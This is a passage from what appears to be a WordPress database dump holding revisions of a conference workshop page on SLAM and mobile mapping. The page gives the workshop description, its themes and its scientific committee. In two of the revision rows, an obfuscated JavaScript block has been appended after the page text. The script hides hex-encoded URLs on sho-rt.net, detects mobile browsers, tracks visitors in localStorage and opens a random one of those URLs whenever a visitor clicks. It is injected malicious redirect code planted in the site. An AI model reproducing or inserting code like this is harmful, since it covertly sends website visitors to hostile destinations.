environments, just to mention a few. The recent development of effective artificial intelligence tools also plays a core role in these applications, in order to enable an effective machine interpretation and understanding of geospatial data.</h5>\n<h5 style=\"text-align: justify; color: black;\">The previously mentioned applications are usually related to the use of mobile platforms working in real time: these requirements imply the use of effective mobile mapping systems. Furthermore, the need for ubiquitous accurate localization goes beyond the possibilities of stand-alone GNSS positioning. In this context, simultaneous mapping and localization (SLAM) techniques have proved to be effective solutions in order to properly compensate for the unreliability of GNSS in certain working conditions, while preserving the possibility of fast accurate mapping.</h5>\n<h5 style=\"text-align: justify; color: black;\">Motivated by the above considerations, this workshop will seek contributions covering advanced topics related to the state of the art and future trends of SLAM approaches for mobile mapping and robot intelligence, focusing both on the mapping and localization problems, and on the artificial intelligence tools needed in order to enable mobile perception and real time machine understanding of geospatial data.</h5>\n[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner][vc_column_text]\n<h1 style=\"text-align: center;\">CHAIRS</h1>\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"36\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]\n<h5 style=\"text-align: justify; color: orange;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n 	<li>\n<h6><strong>Simultaneous localization and mapping (SLAM) techniques</strong></h6>\n</li>\n 	<li>\n<h6><strong>Semantic and metric SLAM</strong></h6>\n</li>\n 	<li>\n<h6><strong>Calibration of mobile (multi) sensor systems</strong></h6>\n</li>\n 	<li>\n<h6><strong>Evaluation of localization and mapping sensors for indoor and outdoor robotics</strong></h6>\n</li>\n 	<li>\n<h6><strong>Learning and optimization for robotics multi-sensor integration</strong></h6>\n</li>\n 	<li>\n<h6><strong>New robotic mapping applications</strong></h6>\n</li>\n 	<li>\n<h6><strong>Mapping representations for robotics and autonomous vehicle navigation</strong></h6>\n</li>\n 	<li>\n<h6><strong>Robotic mapping benchmarks</strong></h6>\n</li>\n 	<li>\n<h6><strong>On-board sensors of autonomous systems for mapping and map updating purposes</strong></h6>\n</li>\n 	<li>\n<h6><strong>Perception in non-controlled or complex or non-cooperative environments</strong></h6>\n</li>\n 	<li>\n<h6><strong>Spatial representations, data structures and database technologies for large scale mapping and map updating</strong></h6>\n</li>\n 	<li>\n<h6><strong>Synergies between indoor mobile mapping and building information modelling (BIM)</strong></h6>\n</li>\n 	<li>\n<h6><strong>Integration of SLAM with inertial sensors</strong></h6>\n</li>\n 	<li>\n<h6><strong>Low cost sensors for mapping and localization</strong></h6>\n</li>\n</ul>\n[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]\n<h5 style=\"text-align: justify; color: orange;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n 	<li>\n<h6><strong>Yuan Zhuang, Wuhan University, China</strong></h6>\n</li>\n 	<li>\n<h6><strong>Vincenzo di Pietra Politecnico di Torino, Italy</strong></h6>\n</li>\n 	<li>\n<h6><strong>Stephan Nebiker, FHNW, Switzerland</strong></h6>\n</li>\n 	<li>\n<h6><strong>Heikki Hyyti, NLS, Finnland</strong></h6>\n</li>\n 	<li>\n<h6><strong>Phillipp Fanta-Jende, AIT, Austria</strong></h6>\n</li>\n 	<li>\n<h6><strong>Norbert Haala, University of Stuttgart</strong></h6>\n</li>\n</ul>\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Robotics for Mapping - SLAM approaches for mobile mapping and robot intelligence','','inherit','closed','closed','','2570-autosave-v1','','','2023-02-05 11:08:30','2023-02-05 11:08:30','',2570,'https://gsw2023.com/?p=2589',0,'revision','',0),
(2590,1,'2022-10-07 20:43:00','2022-10-07 20:43:00','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2585\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: justify; color: black;\">The availability of accurate geospatial information and reliable ubiquitous localization systems are key factors in a number of applications and contexts, ranging from location-based services and smart cities, to the use of terrestrial, underground, aerial and underwater autonomous robots, autonomous driving, and positioning in GNSS-denied environments, just to mention a few. The recent development of effective artificial intelligence tools also plays a core role in these applications, in order to enable an effective machine interpretation and understanding of geospatial data.</h5>\r\n<h5 style=\"text-align: justify; color: black;\">The previously mentioned applications are usually related to the use of mobile platforms working in real time: these requirements imply the use of effective mobile mapping systems. Furthermore, the need for ubiquitous accurate localization goes beyond the possibilities of stand-alone GNSS positioning. In this context, simultaneous mapping and localization (SLAM) techniques have proved to be effective solutions in order to properly compensate for the unreliability of GNSS in certain working conditions, while preserving the possibility of fast accurate mapping.</h5>\r\n<h5 style=\"text-align: justify; color: black;\">Motivated by the above considerations, this workshop will seek contributions covering advanced topics related to the state of the art and future trends of SLAM approaches for mobile mapping and robot intelligence, focusing both on the mapping and localization problems, and on the artificial intelligence tools needed in order to enable mobile perception and real time machine understanding of geospatial data.</h5>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Robotics for Mapping - SLAM approaches for mobile mapping and robot intelligence','','inherit','closed','closed','','2570-revision-v1','','','2022-10-07 20:43:00','2022-10-07 20:43:00','',2570,'https://gsw2023.com/?p=2590',0,'revision','',0),
(2591,1,'2022-10-07 20:47:58','2022-10-07 20:47:58','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2585\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: justify; color: black;\">The availability of accurate geospatial information and reliable ubiquitous localization systems are key factors in a number of applications and contexts, ranging from location-based services and smart cities, to the use of terrestrial, underground, aerial and underwater autonomous robots, autonomous driving, and positioning in GNSS-denied environments, just to mention a few. The recent development of effective artificial intelligence tools also plays a core role in these applications, in order to enable an effective machine interpretation and understanding of geospatial data.</h5>\r\n<h5 style=\"text-align: justify; color: black;\">The previously mentioned applications are usually related to the use of mobile platforms working in real time: 